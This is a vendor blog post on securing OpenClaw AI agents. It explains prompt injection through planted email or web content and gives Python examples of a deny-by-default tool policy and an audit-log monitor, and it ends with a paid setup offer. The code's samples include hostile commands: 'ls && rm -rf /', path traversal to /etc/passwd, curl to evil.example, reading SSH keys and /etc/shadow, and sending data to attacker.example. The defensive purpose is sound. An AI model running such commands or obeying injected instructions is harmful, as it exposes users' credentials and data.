
Securing Your OpenClaw Agent: Why It Matters and What's Involved

H. · 4 min read

Your OpenClaw agent can run shell commands, control browsers, manage files, send messages, and interact with APIs. That's what makes it useful. It's also what makes security non-negotiable.

I've audited enough DIY setups to know that most people either lock things down so tight the agent can't do anything, or leave everything wide open because "it's just running on my home network." Both are wrong.

The real threats

Before hardening anything, understand what you're protecting against:

Prompt injection. Someone plants instructions in content your agent reads (an email, a Slack message, a web page) that try to trick it into executing malicious commands. The attacker never needs access to your channel or your machine; they only need to get text in front of the agent, which is why authenticating the channel alone does not stop it. This is the most realistic threat for most deployments, and it's more common than people think.

Unauthorized access. Someone gains access to your agent's communication channel or the machine it runs on. Now they can issue commands as if they were you.

Data exfiltration. The agent accidentally sends sensitive data somewhere it shouldn't — through a bug in a skill or because a prompt injection directed it to.

Lateral movement. If the agent's host machine is compromised, how much of your network can the attacker reach?

Most home and small business deployments don't need to worry about nation-state attacks. But prompt injection is an everyday risk that anyone running an agent should take seriously.

What proper security looks like

A well-secured OpenClaw deployment has several layers working together:

Principle of least privilege. Your agent should have access to exactly what it needs and nothing more. Restricted file system access, scoped shell permissions, limited network access, and channel-level permission controls.

Tool policies. OpenClaw's tool policy system is your primary security control. Deny by default, then explicitly allow what's needed. Require human confirmation for destructive actions, and treat anything that sends data off the host (messages, HTTP requests, uploads) as a write rather than a read, because that is the exfiltration path. Use read-only access where possible.
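The two paragraphs above (least privilege and deny-by-default tool policies) are easier to reason about with a concrete evaluator in front of you. The following is an added example written for this article, not OpenClaw's own policy engine or configuration format: the tool names (`fs.read`, `shell`, `message.send`), policy fields and workspace path are assumptions chosen to illustrate the model. It shows the three decisions a policy layer has to make (deny, allow, or stop for a human), the path-scoping check for file access, and the shell check that refuses compound commands rather than trusting `argv[0]`.

```python
"""Deny-by-default tool policy evaluator (illustration, not OpenClaw's real API).

Tool names, policy fields and the workspace path below are assumptions for
this example.
"""
import posixpath
import re
import shlex
from dataclasses import dataclass, field
from enum import Enum


class Decision(Enum):
    DENY = "deny"          # never executed
    ALLOW = "allow"        # executed without a human in the loop
    CONFIRM = "confirm"    # executed only after a human approves


# Shell operators that let a second command ride along with an allow-listed
# program: "ls && rm -rf /" still has argv[0] == "ls". Refuse them outright.
_SHELL_METACHARS = re.compile(r"[;&|<>`$\n]")


@dataclass
class ToolPolicy:
    allowed_tools: set = field(default_factory=set)        # everything else is denied
    fs_root: str = "/srv/agent/workspace"                  # the only tree fs.* may touch (assumed path)
    shell_allowlist: set = field(default_factory=set)      # argv[0] values that may run at all
    shell_destructive: set = field(default_factory=set)    # argv[0] values that need confirmation
    allowed_recipients: set = field(default_factory=set)   # message.send targets that need no confirmation


@dataclass(frozen=True)
class ToolCall:
    tool: str
    args: dict


def _inside_root(root: str, path: str) -> bool:
    """True if `path` (absolute, or relative to root) normalizes to a location under root.

    Lexical check only: on a real host also resolve symlinks with
    os.path.realpath before deciding, which an offline example cannot do.
    """
    root = posixpath.normpath(root)
    full = posixpath.normpath(posixpath.join(root, path))
    return full == root or full.startswith(root + "/")


def _evaluate_fs(policy: ToolPolicy, tool: str, args: dict) -> Decision:
    if not _inside_root(policy.fs_root, args.get("path", "")):
        return Decision.DENY                       # outside the sandboxed tree
    if tool == "fs.read":
        return Decision.ALLOW                      # read-only access is cheap to allow
    return Decision.CONFIRM                        # fs.write / fs.delete change state


def _evaluate_shell(policy: ToolPolicy, command: str) -> Decision:
    if _SHELL_METACHARS.search(command):
        return Decision.DENY                       # compound command: cannot be reasoned about
    try:
        argv = shlex.split(command)
    except ValueError:
        return Decision.DENY                       # unbalanced quotes, etc.
    if not argv or argv[0] not in policy.shell_allowlist:
        return Decision.DENY
    if argv[0] in policy.shell_destructive:
        return Decision.CONFIRM
    # git is allow-listed for read-only use; these subcommands rewrite state.
    if argv[0] == "git" and len(argv) > 1 and argv[1] in {"push", "reset", "clean"}:
        return Decision.CONFIRM
    return Decision.ALLOW


def evaluate(policy: ToolPolicy, call: ToolCall) -> Decision:
    """Deny by default: any tool not explicitly allow-listed is refused."""
    if call.tool not in policy.allowed_tools:
        return Decision.DENY
    if call.tool.startswith("fs."):
        return _evaluate_fs(policy, call.tool, call.args)
    if call.tool == "shell":
        return _evaluate_shell(policy, call.args.get("command", ""))
    if call.tool == "message.send":
        # An unknown recipient is the exfiltration path: a human has to approve it.
        if call.args.get("to") in policy.allowed_recipients:
            return Decision.ALLOW
        return Decision.CONFIRM
    return Decision.ALLOW                          # allow-listed tool with no further scoping


# Example policy, constructed for this illustration.
POLICY = ToolPolicy(
    allowed_tools={"fs.read", "fs.write", "shell", "message.send"},
    shell_allowlist={"ls", "cat", "grep", "git", "rm"},
    shell_destructive={"rm"},
    allowed_recipients={"#ops-alerts"},
)

if __name__ == "__main__":
    for call in [
        ToolCall("fs.read", {"path": "notes/todo.md"}),
        ToolCall("fs.read", {"path": "../../etc/passwd"}),
        ToolCall("shell", {"command": "ls && rm -rf /"}),
        ToolCall("shell", {"command": "git push origin main"}),
        ToolCall("browser.open", {"url": "https://example.com"}),
    ]:
        print(f"{call.tool:13} {call.args} -> {evaluate(POLICY, call).value}")
```

Note that `fs.delete` is denied even though it is handled by `_evaluate_fs`: it never made it onto `allowed_tools`, and that is the whole point of deny-by-default. The shell check is deliberately blunt; a policy that tries to understand every quoting and operator trick of `/bin/sh` will lose, so refusing anything with operators in it and allowing only a short list of programs is the safer trade.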

Network hardening. The gateway shouldn't be reachable from the public internet at all; if remote access is unavoidable, put it behind a VPN or an authenticating reverse proxy, never bare. SSH restricted to known IPs. HTTPS everywhere. Firewall rules limiting both inbound and outbound traffic: the outbound rules are what stop a hijacked agent from reaching an attacker's server, so don't skip them.

Audit logging. Every tool invocation, every message, every authentication event, logged and shipped to storage the agent's host cannot modify, so that whoever compromises the host cannot also erase the evidence. With log rotation so your disk doesn't fill up over months.

Secrets management. API keys in environment variables, not in config files that end up in a repo. Keep in mind that environment variables are readable by every process running as the same user, which is one more reason the agent needs its own dedicated account. Separate service accounts for the agent. Regular key rotation. Scoped permissions on every token.

Prompt injection defense. External content treated as data, not instructions: label where it came from, and never let anything inside it change what the agent is allowed to do. Autonomous actions limited and gated. Input validation in custom skills. Monitoring for unusual behavior patterns, so that an injection that gets past the policy is at least noticed.
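The audit-logging paragraph and the last sentence above both come down to the same thing: the logs have to be read by something, and the patterns worth alerting on follow directly from the threats listed earlier. The script below is an added example written for this article, not part of OpenClaw; the JSON-lines record layout, field names and the constructed sample log are assumptions, and the thresholds are placeholders to tune. It flags three patterns over the log: an outbound message or HTTP request made while untrusted content was in the agent's context (the injection-to-exfiltration chain), a burst of policy denials in one session (an injection or a probe hammering against the tool policy), and repeated authentication failures from one address (someone after the channel or the gateway).

```python
"""Audit-log monitor for unusual agent behaviour (added example, not OpenClaw code).

Record layout, field names and the sample log are assumptions for this example.
"""
import json
from collections import defaultdict, deque
from datetime import datetime

# Tools that move data off the host; the destination decides the severity.
EGRESS_TOOLS = {"message.send", "http.request"}
KNOWN_RECIPIENTS = {"#ops-alerts"}                       # exact match (assumed)
KNOWN_URL_PREFIXES = {"https://api.internal.example/"}  # prefix match (assumed)
DENY_BURST, DENY_WINDOW = 3, 60          # >= 3 denials in one session within 60 s
AUTH_FAIL_LIMIT, AUTH_WINDOW = 5, 300    # >= 5 auth failures from one IP within 300 s

# Constructed sample log: one JSON object per line. Session s1 ingests an
# untrusted email, gets three tool calls denied, then sends a message to an
# address nobody allow-listed; an IP then fails authentication five times.
SAMPLE_LOG = """\
{"ts":"2024-05-01T09:00:00Z","event":"ingest","session":"s1","source":"email:vendor@example.net","untrusted":true}
{"ts":"2024-05-01T09:00:05Z","event":"tool_call","session":"s1","tool":"fs.read","args":{"path":"notes/todo.md"},"decision":"allow","untrusted_in_context":true}
{"ts":"2024-05-01T09:00:07Z","event":"tool_call","session":"s1","tool":"shell","args":{"command":"curl http://evil.example"},"decision":"deny","untrusted_in_context":true}
{"ts":"2024-05-01T09:00:09Z","event":"tool_call","session":"s1","tool":"shell","args":{"command":"cat ~/.ssh/id_ed25519"},"decision":"deny","untrusted_in_context":true}
{"ts":"2024-05-01T09:00:11Z","event":"tool_call","session":"s1","tool":"fs.read","args":{"path":"/etc/shadow"},"decision":"deny","untrusted_in_context":true}
{"ts":"2024-05-01T09:00:20Z","event":"tool_call","session":"s1","tool":"message.send","args":{"to":"drop@attacker.example"},"decision":"allow","untrusted_in_context":true}
{"ts":"2024-05-01T10:00:00Z","event":"tool_call","session":"s2","tool":"http.request","args":{"url":"https://api.internal.example/v1/status"},"decision":"allow","untrusted_in_context":true}
{"ts":"2024-05-01T10:00:02Z","event":"tool_call","session":"s2","tool":"message.send","args":{"to":"#ops-alerts"},"decision":"allow","untrusted_in_context":false}
{"ts":"2024-05-01T11:00:00Z","event":"auth","session":"-","source_ip":"203.0.113.7","result":"failure"}
{"ts":"2024-05-01T11:00:03Z","event":"auth","session":"-","source_ip":"203.0.113.7","result":"failure"}
{"ts":"2024-05-01T11:00:06Z","event":"auth","session":"-","source_ip":"203.0.113.7","result":"failure"}
{"ts":"2024-05-01T11:00:09Z","event":"auth","session":"-","source_ip":"203.0.113.7","result":"failure"}
{"ts":"2024-05-01T11:00:12Z","event":"auth","session":"-","source_ip":"203.0.113.7","result":"failure"}
{"ts":"2024-05-01T11:00:30Z","event":"auth","session":"-","source_ip":"203.0.113.7","result":"success"}
"""


def _parse_ts(value: str) -> datetime:
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def _window_hit(window: deque, ts: datetime, limit: int, seconds: int) -> bool:
    """Sliding window: record ts, drop entries older than `seconds`, report if `limit` reached."""
    window.append(ts)
    while (ts - window[0]).total_seconds() > seconds:
        window.popleft()
    return len(window) >= limit


def _known_destination(dest: str) -> bool:
    return dest in KNOWN_RECIPIENTS or any(dest.startswith(p) for p in KNOWN_URL_PREFIXES)


def analyze(log_text: str) -> list:
    """Return findings (dicts with rule, severity, ts, detail) in log order."""
    findings = []
    denials = defaultdict(deque)        # session -> recent denial timestamps
    auth_failures = defaultdict(deque)  # source_ip -> recent failure timestamps
    reported = set()                    # (rule, key): alert once per burst, not per event
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        ts = _parse_ts(rec["ts"])
        if rec["event"] == "tool_call" and rec["decision"] == "deny":
            key = ("denial_burst", rec["session"])
            if _window_hit(denials[rec["session"]], ts, DENY_BURST, DENY_WINDOW) and key not in reported:
                reported.add(key)
                findings.append({"rule": "denial_burst", "severity": "medium", "ts": rec["ts"],
                                 "detail": f"session {rec['session']}: {DENY_BURST}+ policy denials "
                                           f"within {DENY_WINDOW}s (injection or probing)"})
        elif rec["event"] == "tool_call" and rec["tool"] in EGRESS_TOOLS and rec.get("untrusted_in_context"):
            dest = rec["args"].get("to") or rec["args"].get("url", "")
            severity = "low" if _known_destination(dest) else "high"
            findings.append({"rule": "egress_after_untrusted", "severity": severity, "ts": rec["ts"],
                             "detail": f"session {rec['session']}: {rec['tool']} to {dest} "
                                       f"while untrusted content was in context"})
        elif rec["event"] == "auth" and rec["result"] == "failure":
            key = ("auth_bruteforce", rec["source_ip"])
            if _window_hit(auth_failures[rec["source_ip"]], ts, AUTH_FAIL_LIMIT, AUTH_WINDOW) and key not in reported:
                reported.add(key)
                findings.append({"rule": "auth_bruteforce", "severity": "high", "ts": rec["ts"],
                                 "detail": f"{AUTH_FAIL_LIMIT}+ auth failures from {rec['source_ip']} "
                                           f"within {AUTH_WINDOW}s"})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"[{f['severity']:6}] {f['ts']} {f['rule']}: {f['detail']}")
```

The `untrusted_in_context` flag is doing most of the work here, and it only exists if the agent records, per turn, whether anything it read came from outside. That is the logging decision to get right first; the detection rules are easy once the signal is in the log. Run this where the logs are shipped, not on the agent's host, for the reason the audit-logging paragraph gives.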

The security checklist

A properly secured deployment covers:

  1. Agent running as a dedicated, non-root user
  2. Tool policies configured with deny-by-default
  3. Destructive actions requiring human confirmation
  4. Gateway not exposed to public internet
  5. HTTPS on all communication
  6. Audit logging enabled with separate storage
  7. API keys properly managed and rotated
  8. Firewall configured on the host
  9. Kill switch documented and tested
  10. Regular update schedule

Missing any one of these creates a gap. Getting all of them right — and keeping them right as your setup evolves — requires understanding how each piece interacts with the others.

Common mistakes we see

Running the agent as root. More common than you'd think. Creates massive blast radius if anything goes wrong.

Same credentials everywhere. If your agent's Slack token has admin access to your workspace, a prompt injection could do real damage.

No kill switch. If your agent goes haywire, how do you stop it quickly? Every deployment needs a documented emergency shutdown procedure.

Security theater. A complex firewall config means nothing if your API keys are in a public GitHub repo. Focus on the basics first.

Set and forget. Security isn't a one-time setup. Dependencies get patches, new vulnerabilities emerge, configurations drift. Regular review is part of the deal.

Why security is where professional setup matters most

A misconfigured agent with shell access to your server isn't an asset — it's a liability. Security is the area where the cost of getting it wrong is highest, and where experience makes the biggest difference.

We've hardened dozens of OpenClaw deployments across different environments — Mac Minis, VPS, home servers, enterprise networks. We know the common attack vectors, the configuration mistakes, and the monitoring gaps.

If you're running OpenClaw and want a security review, or starting fresh and want it locked down from day one, book a call or check out our setup packages. We'll make sure your agent is useful without being dangerous.


Get Your AI Agent Running

We handle the entire setup — deploy, configure, and secure OpenClaw so you don't have to.

  • Fully deployed in 48 hours
  • All channels — Slack, Telegram, WhatsApp
  • Security hardened from day one
  • 14-day hypercare included

One-time setup

$999

Complete setup, no recurring fees